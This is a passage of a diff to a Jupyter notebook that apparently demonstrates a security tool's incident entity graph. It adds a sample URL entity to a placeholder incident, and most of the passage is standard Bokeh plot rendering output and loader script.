style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='3424', ...)],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='3390', ...),</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='3415', ...),</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='3392', ...),</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='3396', ...),</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='3394', ...),</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='3398', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"3696\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"3695\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='3389', ...)"
+      ]
+     },
+     "execution_count": 13,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "url_ent = Url(Url=\"www.contoso.com\")\n",
+    "graph = EntityGraph(incident)\n",
+    "graph.add_entity(url_ent, attached_to=\"demo\")\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Removing a entity from the graph is done with `remove_node` function, with the name of the entity to remove passed with the `name` parameter:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3698\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3698\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3698\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"c94a2091-15c7-4c43-9d05-91e0d2ee59d8\" data-root-id=\"3699\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"26f4f02f-80da-4c93-a33e-ba195f9be9ff\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"3710\"}],\"center\":[{\"id\":\"3713\"},{\"id\":\"3717\"},{\"id\":\"3749\"},{\"id\":\"3750\"},{\"id\":\"3751\"},{\"id\":\"3752\"}],\"height\":800,\"left\":[{\"id\":\"3714\"}],\"renderers\":[{\"id\":\"3734\"}],\"title\":{\"id\":\"3700\"},\"toolbar\":{\"id\":\"3725\"},\"width\":800,\"x_range\":{\"id\":\"3702\"},\"x_scale\":{\"id\":\"3706\"},\"y_range\":{\"id\":\"3704\"},\"y_scale\":{\"id\":\"3708\"}},\"id\":\"3699\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"formatter\":{\"id\":\"3884\"},\"major_label_policy\":{\"id\":\"3883\"},\"ticker\":{\"id\":\"3715\"}},\"id\":\"3714\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"3706\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3708\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3900\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3711\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"3901\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3718\",\"type\":\"PanTool\"},{\"attributes\":{\"axis\":{\"id\":\"3710\"},\"ticker\":null},\"id\":\"3713\",\"type\":\"Grid\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"3718\"},{\"id\":\"3719\"},{\"id\":\"3720\"},{\"id\":\"3721\"},{\"id\":\"3722\"},{\"id\":\"3723\"},{\"id\":\"3732\"}]},\"id\":\"3725\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"3719\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"3741\"},\"inspection_policy\":{\"id\":\"3890\"},\"layout_provider\":{\"id\":\"3743\"},\"node_renderer\":{\"id\":\"3737\"},\"selection_policy\":{\"id\":\"3891\"}},\"id\":\"3734\",\"type\":\"GraphRenderer\"},{\"attributes\":{},\"id\":\"3883\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"3722\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"3884\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"3702\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"3902\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3891\",\"type\":\"NodesOnly\"},{\"attributes\":{\"graph_layout\":{\"Alert: User Added to Priviledged Group in CONTOSO Domain\":[0.7395680708745855,0.198605324662098],\"CONTOSO\\\\auser\":[0.618298761991292,-0.6731097576385419],\"Incident: Sample Incident\":[0.6421331671341234,-0.23122905556145373],\"www.contoso.com\":[-2.0,0.7057334885378975]}},\"id\":\"3743\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{\"axis\":{\"id\":\"3714\"},\"dimension\":1,\"ticker\":null},\"id\":\"3717\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"3721\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"3903\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"3890\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"3723\",\"type\":\"HelpTool\"},{\"attributes\":{\"data_source\":{\"id\":\"3736\"},\"glyph\":{\"id\":\"3744\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"3738\"}},\"id\":\"3737\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"overlay\":{\"id\":\"3724\"}},\"id\":\"3720\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"3736\"}},\"id\":\"3738\",\"type\":\"CDSView\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"3732\",\"type\":\"HoverTool\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"green\",\"green\"],\"description\":[\"2021-09-22T15:09:09.2786667Z - Sample Incident - 123\",\"User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']\",null,\"www.contoso.com\"],\"end_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null],\"entitytype\":[\"incident\",\"alert\",\"account\",\"url\"],\"index\":[\"Incident: Sample Incident\",\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"name\":[\"Sample Incident\",\"User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"node_color\":[\"red\",\"orange\",\"green\",\"green\"],\"node_type\":[\"incident\",\"alert\",\"entity\",\"entity\"],\"source\":[null,\"{ 'AdditionalData': { 'ID': '8b7d06d8-dbae-4b23-87ed-1a27b75437d5',\\n                      'Name': 'User Added to Priviledged Group in CONTOSO Domain'},\\n  'DisplayName': 'User Added to Priviledged Group in CONTOSO Domain',\\n  'SystemAlertIds': ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5'],\\n  'Type': 'alerts',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DisplayName': 'CONTOSO\\\\\\\\auser',\\n  'IsDomainJoined': False,\\n  'Type': 'account',\\n  'edges': set()}\",\"{'AdditionalData': {}, 'Type': 'url', 'Url': 'www.contoso.com', 'edges': set()}\"],\"start_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null],\"time_generated\":[\"2021-09-22T15:09:09.2786667Z\",null,null,null]},\"selected\":{\"id\":\"3900\"},\"selection_policy\":{\"id\":\"3901\"}},\"id\":\"3736\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"3739\",\"type\":\"MultiLine\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"CONTOSO\\\\auser\"],\"start\":[\"Incident: Sample Incident\",\"Incident: Sample Incident\"]},\"selected\":{\"id\":\"3902\"},\"selection_policy\":{\"id\":\"3903\"}},\"id\":\"3740\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"3896\",\"type\":\"AllLabels\"},{\"attributes\":{\"data_source\":{\"id\":\"3740\"},\"glyph\":{\"id\":\"3739\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"3742\"}},\"id\":\"3741\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"3740\"}},\"id\":\"3742\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"3704\",\"type\":\"Range1d\"},{\"attributes\":{\"formatter\":{\"id\":\"3897\"},\"major_label_policy\":{\"id\":\"3896\"},\"ticker\":{\"id\":\"3711\"}},\"id\":\"3710\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"3897\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"www.contoso.com\",\"text_font_size\":\"10pt\",\"x\":-2.0,\"x_offset\":5,\"y\":0.7057334885378975,\"y_offset\":5},\"id\":\"3752\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"3715\",\"type\":\"BasicTicker\"},{\"attributes\":{\"text\":\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"text_font_size\":\"10pt\",\"x\":0.7395680708745855,\"x_offset\":5,\"y\":0.198605324662098,\"y_offset\":5},\"id\":\"3750\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"CONTOSO\\\\auser\",\"text_font_size\":\"10pt\",\"x\":0.618298761991292,\"x_offset\":5,\"y\":-0.6731097576385419,\"y_offset\":5},\"id\":\"3751\",\"type\":\"Label\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"3724\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"3700\",\"type\":\"Title\"},{\"attributes\":{\"text\":\"Incident: Sample Incident\",\"text_font_size\":\"10pt\",\"x\":0.6421331671341234,\"x_offset\":5,\"y\":-0.23122905556145373,\"y_offset\":5},\"id\":\"3749\",\"type\":\"Label\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"3744\",\"type\":\"Circle\"}],\"root_ids\":[\"3699\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"26f4f02f-80da-4c93-a33e-ba195f9be9ff\",\"root_ids\":[\"3699\"],\"roots\":{\"3699\":\"c94a2091-15c7-4c43-9d05-91e0d2ee59d8\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3699"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'3699', <span id=\"4027\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='3710', ...)],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='3713', ...), Grid(id='3717', ...), Label(id='3749', ...), Label(id='3750', ...), Label(id='3751', ...), Label(id='3752', ...)],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"4026\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div 